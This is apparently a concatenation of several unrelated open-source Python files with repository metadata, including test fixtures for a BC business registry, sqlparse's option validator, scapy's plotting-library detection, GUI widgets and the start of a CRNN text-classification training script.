('6096127', 'RG', 9141401, null, 7404645, 7404644, null, null)""",
"""insert into office (corp_num, office_typ_cd, start_event_id, end_event_id, mailing_addr_id, delivery_addr_id, dd_corp_num, email_address)
values
('6096127', 'RC', 9141401, null, 7404643, 7404642, null, null)""",
"""create table if not exists address (addr_id numeric, province text, country_typ_cd text, postal_cd text, addr_line_1 text, addr_line_2 text, addr_line_3 text, city text, address_format_type text, address_desc text, address_desc_short text, delivery_instructions text, unit_no text, unit_type text, civic_no text, civic_no_suffix text, street_name text, street_type text, street_direction text, lock_box_no text, installation_type text, installation_name text, installation_qualifier text, route_service_type text, route_service_no text, province_state_name text)""",
"""insert into address (addr_id, province, country_typ_cd, postal_cd, addr_line_1, addr_line_2, addr_line_3, city, address_format_type, address_desc, address_desc_short, delivery_instructions, unit_no, unit_type, civic_no, civic_no_suffix, street_name, street_type, street_direction, lock_box_no, installation_type, installation_name, installation_qualifier, route_service_type, route_service_no, province_state_name)
values
(1606746, 'BC', 'CA', 'MHIFWS', 'JYFSNUJMIOZINBMIQYCUDUSAR', 'BAMEPDCRMR YDZWOJPGVFWLTJ', null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null)""",
"""insert into address (addr_id, province, country_typ_cd, postal_cd, addr_line_1, addr_line_2, addr_line_3, city, address_format_type, address_desc, address_desc_short, delivery_instructions, unit_no, unit_type, civic_no, civic_no_suffix, street_name, street_type, street_direction, lock_box_no, installation_type, installation_name, installation_qualifier, route_service_type, route_service_no, province_state_name)
values
(2836996, 'BC', 'CA', '5JFPB2', 'VPDBKQIF XSDDIFT NLPEIOMV', null, null, 'VANCOUVER', null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null)""",
"""insert into address (addr_id, province, country_typ_cd, postal_cd, addr_line_1, addr_line_2, addr_line_3, city, address_format_type, address_desc, address_desc_short, delivery_instructions, unit_no, unit_type, civic_no, civic_no_suffix, street_name, street_type, street_direction, lock_box_no, installation_type, installation_name, installation_qualifier, route_service_type, route_service_no, province_state_name)
values
(2836997, 'BC', 'CA', 'A645UW', 'PNIVFCTTGZSTCNCLSUFCHG ZK', null, null, 'VANCOUVER', null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null)""",
"""insert into address (addr_id, province, country_typ_cd, postal_cd, addr_line_1, addr_line_2, addr_line_3, city, address_format_type, address_desc, address_desc_short, delivery_instructions, unit_no, unit_type, civic_no, civic_no_suffix, street_name, street_type, street_direction, lock_box_no, installation_type, installation_name, installation_qualifier, route_service_type, route_service_no, province_state_name)
values
(2836998, 'BC', 'CA', 'TNOGDH', ' WCYXRKOAAPNTOKSB WFYGGEV', null, null, 'VANCOUVER', null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null)""",
"""insert into address (addr_id, province, country_typ_cd, postal_cd, addr_line_1, addr_line_2, addr_line_3, city, address_format_type, address_desc, address_desc_short, delivery_instructions, unit_no, unit_type, civic_no, civic_no_suffix, street_name, street_type, street_direction, lock_box_no, installation_type, installation_name, installation_qualifier, route_service_type, route_service_no, province_state_name)
values
(2836999, 'BC', 'CA', '4OK4EI', ' HELE CXXVVWCNATIDDBXAEEU', null, null, 'VANCOUVER', null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null)""",
"""insert into address (addr_id, province, country_typ_cd, postal_cd, addr_line_1, addr_line_2, addr_line_3, city, address_format_type, address_desc, address_desc_short, delivery_instructions, unit_no, unit_type, civic_no, civic_no_suffix, street_name, street_type, street_direction, lock_box_no, installation_type, installation_name, installation_qualifier, route_service_type, route_service_no, province_state_name)
values
(7404642, 'BC', 'CA', 'VSX7G8', 'AADWCOLUFJSASZQBFCWMOHJHN', 'WTVJIGYKXAHGZTYEEBRGLIDLO', null, 'Vancouver', null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null)""",
"""insert into address (addr_id, province, country_typ_cd, postal_cd, addr_line_1, addr_line_2, addr_line_3, city, address_format_type, address_desc, address_desc_short, delivery_instructions, unit_no, unit_type, civic_no, civic_no_suffix, street_name, street_type, street_direction, lock_box_no, installation_type, installation_name, installation_qualifier, route_service_type, route_service_no, province_state_name)
values
(7404643, 'BC', 'CA', 'C8886D', 'ZXXIBPHZQJBRXTTQRO HCSRAI', 'BYSCABJETMIFAX MIHLBTBAAE', null, 'Vancouver', null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null)""",
"""insert into address (addr_id, province, country_typ_cd, postal_cd, addr_line_1, addr_line_2, addr_line_3, city, address_format_type, address_desc, address_desc_short, delivery_instructions, unit_no, unit_type, civic_no, civic_no_suffix, street_name, street_type, street_direction, lock_box_no, installation_type, installation_name, installation_qualifier, route_service_type, route_service_no, province_state_name)
values
(7404644, 'BC', 'CA', 'VYXN94', 'RIILJCAEYEHMTZFGLJMLEOPHE', 'RNVOLRLYGKSWKKOUUEE FYOUO', null, 'Vancouver', null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null)""",
"""insert into address (addr_id, province, country_typ_cd, postal_cd, addr_line_1, addr_line_2, addr_line_3, city, address_format_type, address_desc, address_desc_short, delivery_instructions, unit_no, unit_type, civic_no, civic_no_suffix, street_name, street_type, street_direction, lock_box_no, installation_type, installation_name, installation_qualifier, route_service_type, route_service_no, province_state_name)
values
(7404645, 'BC', 'CA', '2IFBB1', 'QUAETPPSJOXNSKSYYVY NWPHK', 'IWLXVNQKIAYDNUUGKDZRVSBYM', null, 'Vancouver', null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null)""",
]
with BCRegistries(True) as cached_bc_reg:
cached_bc_reg.cache_bcreg_code_tables()
cached_bc_reg.insert_cache_sqls(corp_sqls)
# try running with dummy event id zero
corp_info = cached_bc_reg.get_bc_reg_corp_info(corp_num)
#print('-------------------------')
#print('corp_info:')
#print(corp_info)
#print('-------------------------')
start_event = {'event_id':0, 'event_date':MIN_START_DATE}
end_event = {'event_id':9999999999, 'event_date':MAX_END_DATE}
with EventProcessor() as event_processor:
corp_creds = event_processor.generate_credentials(system_type, start_event, end_event, corp_num, corp_info)
#print('-------------------------')
#print('corp_creds:')
#print(corp_creds)
#print('-------------------------')
# no assertions, just make sure all test data is working
def test_preset_corp_scenario_all():
for test_corp in sample_test_corps.keys():
corp_num = sample_test_corps[test_corp]['corp_num']
corp_sqls = sample_test_corps[test_corp]['sqls']
with BCRegistries(True) as cached_bc_reg:
cached_bc_reg.cache_bcreg_code_tables()
cached_bc_reg.insert_cache_sqls(corp_sqls)
corp_info = cached_bc_reg.get_bc_reg_corp_info(corp_num)
start_event = {'event_id':0, 'event_date':MIN_START_DATE}
end_event = {'event_id':9999999999, 'event_date':MAX_END_DATE}
with EventProcessor() as event_processor:
corp_creds = event_processor.generate_credentials(system_type, start_event, end_event, corp_num, corp_info)
#print("Corp: " + corp_num + " generated " + str(len(corp_creds)) + " credentials")
# load a specific corporation and make some assertions on the generated credentials
def test_preset_corp_scenario_3dbas():
# use corp corp_A5589691
corp_num = sample_test_corps['corp_A5589691']['corp_num']
corp_sqls = sample_test_corps['corp_A5589691']['sqls']
with BCRegistries(True) as cached_bc_reg:
cached_bc_reg.cache_bcreg_code_tables()
cached_bc_reg.insert_cache_sqls(corp_sqls)
corp_info = cached_bc_reg.get_bc_reg_corp_info(corp_num)
start_event = {'event_id':0, 'event_date':MIN_START_DATE}
end_event = {'event_id':9999999999, 'event_date':MAX_END_DATE}
with EventProcessor() as event_processor:
corp_creds = event_processor.generate_credentials(system_type, start_event, end_event, corp_num, corp_info)
#print(corp_creds)
assert len(corp_creds) == 6
assert corp_creds[1]['cred_type'] == 'REG'
assert corp_creds[2]['cred_type'] == 'ADDR'
assert corp_creds[3]['cred_type'] == 'REL'
assert corp_creds[4]['cred_type'] == 'REL'
assert corp_creds[5]['cred_type'] == 'REL'
| 102.565217
| 619
| 0.69671
|
7b28fc9e2a06ba75944fa9f03de47a767c89d64e
| 2,051
|
py
|
Python
|
kiwi_scp/commands/decorators.py
|
yavook/kiwi-scp
|
ca4263d913cfbdedc8b14334e3cad61c3b95f0a7
|
[
"MIT"
] | null | null | null |
kiwi_scp/commands/decorators.py
|
yavook/kiwi-scp
|
ca4263d913cfbdedc8b14334e3cad61c3b95f0a7
|
[
"MIT"
] | null | null | null |
kiwi_scp/commands/decorators.py
|
yavook/kiwi-scp
|
ca4263d913cfbdedc8b14334e3cad61c3b95f0a7
|
[
"MIT"
] | null | null | null |
from typing import Callable, Type, Optional, Tuple
import click
from .cmd import KiwiCommandType, KiwiCommand
from ..instance import Instance
_pass_instance = click.make_pass_decorator(
Instance,
ensure=True,
)
_project_arg = click.argument(
"project_name",
metavar="PROJECT",
type=str,
)
_projects_arg = click.argument(
"project_names",
metavar="[PROJECT]...",
nargs=-1,
type=str,
)
_services_arg_p = click.argument(
"project_name",
metavar="[PROJECT]",
required=False,
type=str,
)
_services_arg_s = click.argument(
"service_names",
metavar="[SERVICE]...",
nargs=-1,
type=str,
)
def kiwi_command(
**decorator_kwargs,
) -> Callable:
def decorator(command_cls: Type[KiwiCommand]) -> Callable:
@click.command(
help=command_cls.__doc__,
**decorator_kwargs,
)
@_pass_instance
def cmd(ctx: Instance, project_name: Optional[str] = None, project_names: Optional[Tuple[str]] = None,
service_names: Optional[Tuple[str]] = None, **kwargs) -> None:
if command_cls.type is KiwiCommandType.INSTANCE:
project_names = []
elif command_cls.type is KiwiCommandType.PROJECTS:
project_names = list(project_names)
else:
if project_name is None:
project_names = []
else:
project_names = [project_name]
if command_cls.type is KiwiCommandType.SERVICES:
service_names = list(service_names)
command_cls.run(ctx, project_names, service_names, **kwargs)
if command_cls.type is KiwiCommandType.PROJECT:
cmd = _project_arg(cmd)
elif command_cls.type is KiwiCommandType.PROJECTS:
cmd = _projects_arg(cmd)
elif command_cls.type is KiwiCommandType.SERVICES:
cmd = _services_arg_p(cmd)
cmd = _services_arg_s(cmd)
return cmd
return decorator
| 24.416667
| 110
| 0.612384
|
55959675db0e9ab6b53e6e9266e0ae547aa52c22
| 701
|
py
|
Python
|
view/distanceinfobox.py
|
siralmat/2018-trek-assignment
|
522186e1dfceb0253ad18d8cf82b5c9ddc0ee7bb
|
[
"MIT"
] | null | null | null |
view/distanceinfobox.py
|
siralmat/2018-trek-assignment
|
522186e1dfceb0253ad18d8cf82b5c9ddc0ee7bb
|
[
"MIT"
] | null | null | null |
view/distanceinfobox.py
|
siralmat/2018-trek-assignment
|
522186e1dfceb0253ad18d8cf82b5c9ddc0ee7bb
|
[
"MIT"
] | null | null | null |
"""
Module: distanceinfobox
Author: siralmat
"""
from PyQt5 import QtWidgets as Qw
from view.ui_distanceinfobox import Ui_DistanceInfoBox
class DistanceInfoBox(Qw.QWidget):
"""Small widget to display information about a distance."""
def __init__(self, parent):
"""Set up layout."""
super().__init__()
self._parent = parent
self._ui = Ui_DistanceInfoBox()
self._ui.setupUi(self)
def update(self, distance):
"""Update distance values."""
self._ui.horizontal.setText(format(distance.horizontal, ".2f"))
self._ui.ascent.setText(format(distance.ascent, ".2f"))
self._ui.descent.setText(format(distance.descent, ".2f"))
| 30.478261
| 71
| 0.669044
|
49df766becac117cc7713fbc7f92a7c9c0aa124a
| 1,258
|
py
|
Python
|
host/nodeserver/src/nodetypes.py
|
jbernardis/mycmri
|
8b84d7483ec42c31dc0da57a46f6d4d264a43836
|
[
"MIT"
] | null | null | null |
host/nodeserver/src/nodetypes.py
|
jbernardis/mycmri
|
8b84d7483ec42c31dc0da57a46f6d4d264a43836
|
[
"MIT"
] | null | null | null |
host/nodeserver/src/nodetypes.py
|
jbernardis/mycmri
|
8b84d7483ec42c31dc0da57a46f6d4d264a43836
|
[
"MIT"
] | null | null | null |
OUTPUT_ON = b'1'
OUTPUT_OFF = b'0'
OUTPUT_PULSE = b'P'
OUTPUT_CURRENT = b'O'
INPUT_DELTA = b'D'
INPUT_CURRENT = b'C'
TURNOUT_NORMAL = b'N'
TURNOUT_REVERSE = b'R'
IDENTIFY = b'Y'
SERVO_ANGLE = b'A'
SET_TURNOUT = b'T'
GET_TURNOUT = b'G'
CONFIG = b'F'
ACKNOWLEDGE = b'!'
STORE = b'W'
ERRORRESPONSE = b'E'
WARNINGRESPONSE = b'e'
def commandName(cmd):
if cmd == OUTPUT_ON:
return("OUTPUT_ON")
elif cmd == OUTPUT_OFF:
return("OUTPUT_OFF")
elif cmd == OUTPUT_PULSE:
return("OUTPUT_PULSE")
elif cmd == OUTPUT_CURRENT:
return("OUTPUT_CURRENT")
elif cmd == INPUT_DELTA:
return("INPUT_DELTA")
elif cmd == INPUT_CURRENT:
return("INPUT_CURRENT")
elif cmd == TURNOUT_NORMAL:
return("TURNOUT_NORMAL")
elif cmd == TURNOUT_REVERSE:
return("TURNOUT_REVERSE")
elif cmd == SERVO_ANGLE:
return("SERVO_ANGLE")
elif cmd == SET_TURNOUT:
return("SET_TURNOUT")
elif cmd == GET_TURNOUT:
return("GET_TURNOUT")
elif cmd == IDENTIFY:
return("IDENTIFY")
elif cmd == CONFIG:
return("CONFIG")
elif cmd == ACKNOWLEDGE:
return("ACKNOWLEDGE")
elif cmd == STORE:
return("STORE")
elif cmd == ERRORRESPONSE:
return("ERRORRESPONSE")
elif cmd == WARNINGRESPONSE:
return("WARNINGRESPONSE")
else:
return("UNKNOWN COMMAND: %s" % str(cmd))
| 20.966667
| 42
| 0.689189
|
7d8dd6aaeeeb357d01d33ca9b2e3f07540c96bb5
| 1,861
|
py
|
Python
|
03_SweynTooth/libs/scapy/extlib.py
|
Charmve/BLE-Security-Att-Def
|
3652d84bf4ac0c694bb3c4c0f611098da9122af0
|
[
"BSD-2-Clause"
] | 149
|
2020-10-23T23:31:51.000Z
|
2022-03-15T00:25:35.000Z
|
03_SweynTooth/libs/scapy/extlib.py
|
Charmve/BLE-Security-Att-Def
|
3652d84bf4ac0c694bb3c4c0f611098da9122af0
|
[
"BSD-2-Clause"
] | 1
|
2021-04-12T19:24:00.000Z
|
2021-04-27T03:11:07.000Z
|
03_SweynTooth/libs/scapy/extlib.py
|
Charmve/BLE-Security-Att-Def
|
3652d84bf4ac0c694bb3c4c0f611098da9122af0
|
[
"BSD-2-Clause"
] | 22
|
2020-11-17T02:52:40.000Z
|
2022-03-15T00:26:38.000Z
|
# This file is part of Scapy
# See http://www.secdev.org/projects/scapy for more information
# Copyright (C) Philippe Biondi <phil@secdev.org>
# This program is published under a GPLv2 license
"""
External link to programs
"""
import os
import subprocess
from scapy.error import log_loading
# Notice: this file must not be called before main.py, if started
# in interactive mode, because it needs to be called after the
# logger has been setup, to be able to print the warning messages
# MATPLOTLIB
try:
from matplotlib import get_backend as matplotlib_get_backend
from matplotlib import pyplot as plt
from matplotlib.lines import Line2D
MATPLOTLIB = 1
if "inline" in matplotlib_get_backend():
MATPLOTLIB_INLINED = 1
else:
MATPLOTLIB_INLINED = 0
MATPLOTLIB_DEFAULT_PLOT_KARGS = {"marker": "+"}
# RuntimeError to catch gtk "Cannot open display" error
except (ImportError, RuntimeError):
plt = None
Line2D = None
MATPLOTLIB = 0
MATPLOTLIB_INLINED = 0
MATPLOTLIB_DEFAULT_PLOT_KARGS = dict()
log_loading.info("Can't import matplotlib. Won't be able to plot.")
# PYX
def _test_pyx():
"""Returns if PyX is correctly installed or not"""
try:
with open(os.devnull, 'wb') as devnull:
r = subprocess.check_call(["pdflatex", "--version"],
stdout=devnull, stderr=subprocess.STDOUT)
except (subprocess.CalledProcessError, OSError):
return False
else:
return r == 0
try:
import pyx # noqa: F401
if _test_pyx():
PYX = 1
else:
log_loading.info("PyX dependencies are not installed ! Please install TexLive or MikTeX.") # noqa: E501
PYX = 0
except ImportError:
log_loading.info("Can't import PyX. Won't be able to use psdump() or pdfdump().") # noqa: E501
PYX = 0
| 29.078125
| 112
| 0.675981
|
6a1203ccf0cc099c355da1cafb7f88311692c9fd
| 577
|
py
|
Python
|
insta/migrations/0004_auto_20180515_1050.py
|
muturi254/instagram
|
8b8196ce0a1b5cefbe24d63202086479f0f06b27
|
[
"MIT"
] | 1
|
2018-05-11T11:25:13.000Z
|
2018-05-11T11:25:13.000Z
|
insta/migrations/0004_auto_20180515_1050.py
|
muturi254/instagram
|
8b8196ce0a1b5cefbe24d63202086479f0f06b27
|
[
"MIT"
] | null | null | null |
insta/migrations/0004_auto_20180515_1050.py
|
muturi254/instagram
|
8b8196ce0a1b5cefbe24d63202086479f0f06b27
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-05-15 10:50
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('insta', '0003_auto_20180515_1043'),
]
operations = [
migrations.AlterField(
model_name='image',
name='image_owner',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
| 25.086957
| 110
| 0.670711
|
e67431fca83cf2d85c3a01ff732f78a60fa4b7e8
| 1,926
|
py
|
Python
|
src/gtk/toga_gtk/widgets/webview.py
|
d3r3kk/toga
|
2d8c0eb30371c4ef4f0610251233569e9c618e93
|
[
"BSD-3-Clause"
] | 2
|
2019-02-19T17:19:24.000Z
|
2020-04-13T21:22:24.000Z
|
src/gtk/toga_gtk/widgets/webview.py
|
d3r3kk/toga
|
2d8c0eb30371c4ef4f0610251233569e9c618e93
|
[
"BSD-3-Clause"
] | 2
|
2019-10-26T20:54:06.000Z
|
2019-10-26T21:43:43.000Z
|
src/gtk/toga_gtk/widgets/webview.py
|
d3r3kk/toga
|
2d8c0eb30371c4ef4f0610251233569e9c618e93
|
[
"BSD-3-Clause"
] | 4
|
2019-02-13T17:54:15.000Z
|
2019-10-26T21:16:27.000Z
|
import gi
from gi.repository import Gtk
# The following import will fail if WebKit or it's API wrappers aren't
# installed; handle failure gracefully
# (see https://github.com/pybee/toga/issues/26)
# Accept any API version greater than 3.0
WebKit2 = None
for version in ['4.0', '3.0']:
try:
gi.require_version('WebKit2', version)
from gi.repository import WebKit2
break
except (ImportError, ValueError):
pass
from .base import Widget
class WebView(Widget):
""" GTK WebView implementation.
TODO: WebView is not displaying anything when setting a url.
"""
def create(self):
if WebKit2 is None:
raise RuntimeError(
"Import 'from gi.repository import WebKit' failed;" +
" may need to install gir1.2-webkit2-4.0 or gir1.2-webkit2-3.0.")
self.native = Gtk.ScrolledWindow()
self.native.set_policy(Gtk.PolicyType.AUTOMATIC, Gtk.PolicyType.AUTOMATIC)
self.native.interface = self.interface
self.webview = WebKit2.WebView()
self.native.add(self.webview)
self.native.set_min_content_width(200)
self.native.set_min_content_height(200)
# self.native.connect('show', lambda event: self.rehint())
def set_url(self, value):
if value:
self.webview.load_uri(value)
def set_user_agent(self, value):
self.interface.factory.not_implemented('Window.info_dialog()')
# self.native.user_agent = value if value else "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36"
def set_content(self, root_url, content):
self.webview.load_html(content, root_url)
def get_dom(self):
self.interface.factory.not_implemented('WebView.get_dom()')
def evaluate(self, javascript):
return self.webview.run_javascript(javascript, None, None, None)
| 31.57377
| 162
| 0.669782
|
f890932fe5c436f898b9c2d5be81c458df61f84c
| 6,535
|
py
|
Python
|
sqlparse/formatter.py
|
vmuriart/sqlparse
|
0c1c96e237269ba6b964a766c4fc2fc503af5d9c
|
[
"BSD-3-Clause"
] | 1
|
2017-06-26T01:39:21.000Z
|
2017-06-26T01:39:21.000Z
|
sqlparse/formatter.py
|
vmuriart/sqlparse
|
0c1c96e237269ba6b964a766c4fc2fc503af5d9c
|
[
"BSD-3-Clause"
] | 2
|
2016-05-25T01:09:04.000Z
|
2016-05-30T18:06:17.000Z
|
sqlparse/formatter.py
|
vmuriart/sqlparse
|
0c1c96e237269ba6b964a766c4fc2fc503af5d9c
|
[
"BSD-3-Clause"
] | 1
|
2020-04-27T10:41:31.000Z
|
2020-04-27T10:41:31.000Z
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2016 Andi Albrecht, albrecht.andi@gmail.com
#
# This module is part of python-sqlparse and is released under
# the BSD License: http://www.opensource.org/licenses/bsd-license.php
"""SQL formatter"""
from sqlparse import filters
from sqlparse.exceptions import SQLParseError
def validate_options(options):
"""Validates options."""
kwcase = options.get('keyword_case')
if kwcase not in [None, 'upper', 'lower', 'capitalize']:
raise SQLParseError('Invalid value for keyword_case: '
'{0!r}'.format(kwcase))
idcase = options.get('identifier_case')
if idcase not in [None, 'upper', 'lower', 'capitalize']:
raise SQLParseError('Invalid value for identifier_case: '
'{0!r}'.format(idcase))
ofrmt = options.get('output_format')
if ofrmt not in [None, 'sql', 'python', 'php']:
raise SQLParseError('Unknown output format: '
'{0!r}'.format(ofrmt))
strip_comments = options.get('strip_comments', False)
if strip_comments not in [True, False]:
raise SQLParseError('Invalid value for strip_comments: '
'{0!r}'.format(strip_comments))
space_around_operators = options.get('use_space_around_operators', False)
if space_around_operators not in [True, False]:
raise SQLParseError('Invalid value for use_space_around_operators: '
'{0!r}'.format(space_around_operators))
strip_ws = options.get('strip_whitespace', False)
if strip_ws not in [True, False]:
raise SQLParseError('Invalid value for strip_whitespace: '
'{0!r}'.format(strip_ws))
truncate_strings = options.get('truncate_strings')
if truncate_strings is not None:
try:
truncate_strings = int(truncate_strings)
except (ValueError, TypeError):
raise SQLParseError('Invalid value for truncate_strings: '
'{0!r}'.format(truncate_strings))
if truncate_strings <= 1:
raise SQLParseError('Invalid value for truncate_strings: '
'{0!r}'.format(truncate_strings))
options['truncate_strings'] = truncate_strings
options['truncate_char'] = options.get('truncate_char', '[...]')
reindent = options.get('reindent', False)
if reindent not in [True, False]:
raise SQLParseError('Invalid value for reindent: '
'{0!r}'.format(reindent))
elif reindent:
options['strip_whitespace'] = True
reindent_aligned = options.get('reindent_aligned', False)
if reindent_aligned not in [True, False]:
raise SQLParseError('Invalid value for reindent_aligned: '
'{0!r}'.format(reindent))
elif reindent_aligned:
options['strip_whitespace'] = True
indent_tabs = options.get('indent_tabs', False)
if indent_tabs not in [True, False]:
raise SQLParseError('Invalid value for indent_tabs: '
'{0!r}'.format(indent_tabs))
elif indent_tabs:
options['indent_char'] = '\t'
else:
options['indent_char'] = ' '
indent_width = options.get('indent_width', 2)
try:
indent_width = int(indent_width)
except (TypeError, ValueError):
raise SQLParseError('indent_width requires an integer')
if indent_width < 1:
raise SQLParseError('indent_width requires a positive integer')
options['indent_width'] = indent_width
wrap_after = options.get('wrap_after', 0)
try:
wrap_after = int(wrap_after)
except (TypeError, ValueError):
raise SQLParseError('wrap_after requires an integer')
if wrap_after < 0:
raise SQLParseError('wrap_after requires a positive integer')
options['wrap_after'] = wrap_after
right_margin = options.get('right_margin')
if right_margin is not None:
try:
right_margin = int(right_margin)
except (TypeError, ValueError):
raise SQLParseError('right_margin requires an integer')
if right_margin < 10:
raise SQLParseError('right_margin requires an integer > 10')
options['right_margin'] = right_margin
return options
def build_filter_stack(stack, options):
"""Setup and return a filter stack.
Args:
stack: :class:`~sqlparse.filters.FilterStack` instance
options: Dictionary with options validated by validate_options.
"""
# Token filter
if options.get('keyword_case'):
stack.preprocess.append(
filters.KeywordCaseFilter(options['keyword_case']))
if options.get('identifier_case'):
stack.preprocess.append(
filters.IdentifierCaseFilter(options['identifier_case']))
if options.get('truncate_strings'):
stack.preprocess.append(filters.TruncateStringFilter(
width=options['truncate_strings'], char=options['truncate_char']))
if options.get('strip_comments'):
stack.preprocess.append(filters.StripCommentsFilter())
# After grouping
if options.get('use_space_around_operators', False):
stack.enable_grouping()
stack.stmtprocess.append(filters.SpacesAroundOperatorsFilter())
if options.get('strip_whitespace') or options.get('reindent'):
stack.enable_grouping()
stack.stmtprocess.append(filters.StripWhitespaceFilter())
if options.get('reindent'):
stack.enable_grouping()
stack.stmtprocess.append(
filters.ReindentFilter(char=options['indent_char'],
width=options['indent_width'],
wrap_after=options['wrap_after']))
if options.get('reindent_aligned', False):
stack.enable_grouping()
stack.stmtprocess.append(
filters.AlignedIndentFilter(char=options['indent_char']))
if options.get('right_margin'):
stack.enable_grouping()
stack.stmtprocess.append(
filters.RightMarginFilter(width=options['right_margin']))
# Serializer
if options.get('output_format'):
frmt = options['output_format']
if frmt.lower() == 'php':
fltr = filters.OutputPHPFilter()
elif frmt.lower() == 'python':
fltr = filters.OutputPythonFilter()
else:
fltr = None
if fltr is not None:
stack.postprocess.append(fltr)
return stack
| 37.342857
| 78
| 0.633665
|
5f67cf5afe18ca0462bbc3e7dcf6d3059249d48b
| 18,587
|
py
|
Python
|
CRNN/train_crnn.py
|
erichan2046/Multi-Label-Text-Classification-1
|
6e36d0566240eb8e44eda69e90a04e83e199f147
|
[
"Apache-2.0"
] | null | null | null |
CRNN/train_crnn.py
|
erichan2046/Multi-Label-Text-Classification-1
|
6e36d0566240eb8e44eda69e90a04e83e199f147
|
[
"Apache-2.0"
] | null | null | null |
CRNN/train_crnn.py
|
erichan2046/Multi-Label-Text-Classification-1
|
6e36d0566240eb8e44eda69e90a04e83e199f147
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding:utf-8 -*-
__author__ = 'Randolph'
import os
import sys
import time
import logging
import tensorflow as tf
from utils import data_helpers as dh
from text_crnn import TextCRNN
from tensorboard.plugins import projector
# Parameters
# ==================================================
TRAIN_OR_RESTORE = input("☛ Train or Restore?(T/R) \n")
while not (TRAIN_OR_RESTORE.isalpha() and TRAIN_OR_RESTORE.upper() in ['T', 'R']):
TRAIN_OR_RESTORE = input('✘ The format of your input is illegal, please re-input: ')
logging.info('✔︎ The format of your input is legal, now loading to next step...')
TRAIN_OR_RESTORE = TRAIN_OR_RESTORE.upper()
if TRAIN_OR_RESTORE == 'T':
logger = dh.logger_fn('tflog', 'logs/training-{0}.log'.format(time.asctime()))
if TRAIN_OR_RESTORE == 'R':
logger = dh.logger_fn('tflog', 'logs/restore-{0}.log'.format(time.asctime()))
TRAININGSET_DIR = '../data/Train.json'
VALIDATIONSET_DIR = '../data/Validation.json'
METADATA_DIR = '../data/metadata.tsv'
# Data Parameters
tf.flags.DEFINE_string("training_data_file", TRAININGSET_DIR, "Data source for the training data.")
tf.flags.DEFINE_string("validation_data_file", VALIDATIONSET_DIR, "Data source for the validation data.")
tf.flags.DEFINE_string("metadata_file", METADATA_DIR, "Metadata file for embedding visualization"
"(Each line is a word segment in metadata_file).")
tf.flags.DEFINE_string("train_or_restore", TRAIN_OR_RESTORE, "Train or Restore.")
# Model Hyperparameters
tf.flags.DEFINE_float("learning_rate", 0.001, "The learning rate (default: 0.001)")
tf.flags.DEFINE_integer("pad_seq_len", 100, "Recommended padding Sequence length of data (depends on the data)")
tf.flags.DEFINE_integer("embedding_dim", 100, "Dimensionality of character embedding (default: 128)")
tf.flags.DEFINE_integer("embedding_type", 1, "The embedding type (default: 1)")
tf.flags.DEFINE_integer("lstm_hidden_size", 256, "Hidden size for bi-lstm layer(default: 256)")
tf.flags.DEFINE_integer("fc_hidden_size", 1024, "Hidden size for fully connected layer (default: 1024)")
tf.flags.DEFINE_string("filter_sizes", "3,4,5", "Comma-separated filter sizes (default: '3,4,5')")
tf.flags.DEFINE_integer("num_filters", 128, "Number of filters per filter size (default: 128)")
tf.flags.DEFINE_float("dropout_keep_prob", 0.5, "Dropout keep probability (default: 0.5)")
tf.flags.DEFINE_float("l2_reg_lambda", 0.0, "L2 regularization lambda (default: 0.0)")
tf.flags.DEFINE_integer("num_classes", 367, "Number of labels (depends on the task)")
tf.flags.DEFINE_integer("top_num", 5, "Number of top K prediction classes (default: 5)")
tf.flags.DEFINE_float("threshold", 0.5, "Threshold for prediction classes (default: 0.5)")
# Training Parameters
tf.flags.DEFINE_integer("batch_size", 1024, "Batch Size (default: 256)")
tf.flags.DEFINE_integer("num_epochs", 150, "Number of training epochs (default: 100)")
tf.flags.DEFINE_integer("evaluate_every", 5000, "Evaluate model on dev set after this many steps (default: 5000)")
tf.flags.DEFINE_float("norm_ratio", 2, "The ratio of the sum of gradients norms of trainable variable (default: 1.25)")
tf.flags.DEFINE_integer("decay_steps", 5000, "how many steps before decay learning rate. (default: 500)")
tf.flags.DEFINE_float("decay_rate", 0.95, "Rate of decay for learning rate. (default: 0.95)")
tf.flags.DEFINE_integer("checkpoint_every", 1000, "Save model after this many steps (default: 1000)")
tf.flags.DEFINE_integer("num_checkpoints", 50, "Number of checkpoints to store (default: 50)")
# Misc Parameters
tf.flags.DEFINE_boolean("allow_soft_placement", True, "Allow device soft device placement")
tf.flags.DEFINE_boolean("log_device_placement", False, "Log placement of ops on devices")
tf.flags.DEFINE_boolean("gpu_options_allow_growth", True, "Allow gpu options growth")
FLAGS = tf.flags.FLAGS
FLAGS(sys.argv)
dilim = '-' * 100
logger.info('\n'.join([dilim, *['{0:>50}|{1:<50}'.format(attr.upper(), FLAGS.__getattr__(attr))
for attr in sorted(FLAGS.__dict__['__wrapped'])], dilim]))
def train_crnn():
"""Training CRNN model."""
# Load sentences, labels, and training parameters
logger.info('✔︎ Loading data...')
logger.info('✔︎ Training data processing...')
train_data = dh.load_data_and_labels(FLAGS.training_data_file, FLAGS.num_classes,
FLAGS.embedding_dim, data_aug_flag=False)
logger.info('✔︎ Validation data processing...')
validation_data = dh.load_data_and_labels(FLAGS.validation_data_file, FLAGS.num_classes,
FLAGS.embedding_dim, data_aug_flag=False)
logger.info('Recommended padding Sequence length is: {0}'.format(FLAGS.pad_seq_len))
logger.info('✔︎ Training data padding...')
x_train, y_train = dh.pad_data(train_data, FLAGS.pad_seq_len)
logger.info('✔︎ Validation data padding...')
x_validation, y_validation = dh.pad_data(validation_data, FLAGS.pad_seq_len)
# Build vocabulary
